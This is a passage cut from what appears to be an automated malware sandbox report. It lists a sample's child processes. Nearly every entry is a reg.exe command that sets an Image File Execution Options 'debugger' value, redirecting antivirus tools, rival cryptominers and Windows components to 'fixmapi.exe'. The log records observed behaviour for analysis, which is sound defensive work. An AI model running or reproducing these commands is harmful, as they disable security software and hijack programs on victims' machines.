  PID:3176
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHWatchdogWare.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrssl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpnet.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetLibrary.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetFramework.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\servidor.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icsys.icn.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bmc-cpu.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bmc-cpu-32" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRManager.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRFeature.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2360
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HostStore.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHActiveSecurity.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSvchost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoolvs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tmmt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:636
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tmmt64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvnc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinHide.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer-sse42.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svhosr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrWeb.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsb.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OOSU10.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windir.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mine_cp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Interl thesaurus service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VC90.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrashService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemHost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mouse Lock_v22.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wprehwc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TpmInit.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1416
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4832
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsmosee.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauclt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysdown.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsproflt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrsst.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win-active.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update-app.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\network-app.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win-update.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update-api.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win-app.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemF0D7.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HostXmrig.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vmms.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mqtgcvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\srvan.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ssyncer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3736
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system64" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qimlsrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQExternal.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dsrviml.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WUDFHost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4876
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\redsurf.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ROMFUSClient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\eset_antivirus.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UI0detect.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mine_mx.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cbVSCService11.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cbService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schedhlp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TibMounterMonitor.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrueImageMonitor.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brosec.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmrg.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskManagerService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemDriveHost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2324
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VVUDFHost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcn.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win-api.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windrws.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Conime.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSafeTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:808
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winidow.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemSetting.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\servicess.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchosts.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2268
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\StartUpTool_w.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_opt_AVX2_AES.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NsCpuCNMiner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4884
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spywareblaster.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minergate-cli.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mscvin.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xngiesa.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\miner65.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svch0st.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Tasksmgrs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kryptex7.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kryptex.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmr-stak.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbox.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemIDLE.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trjscan.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\System Idle Process.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssm-xsc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmr-stak-cpu.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccminer-x64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SVRTservice.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SVRTgui.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SVRTcli.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCTCleanupService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\starter_avp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Client Server Runtime Procces.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
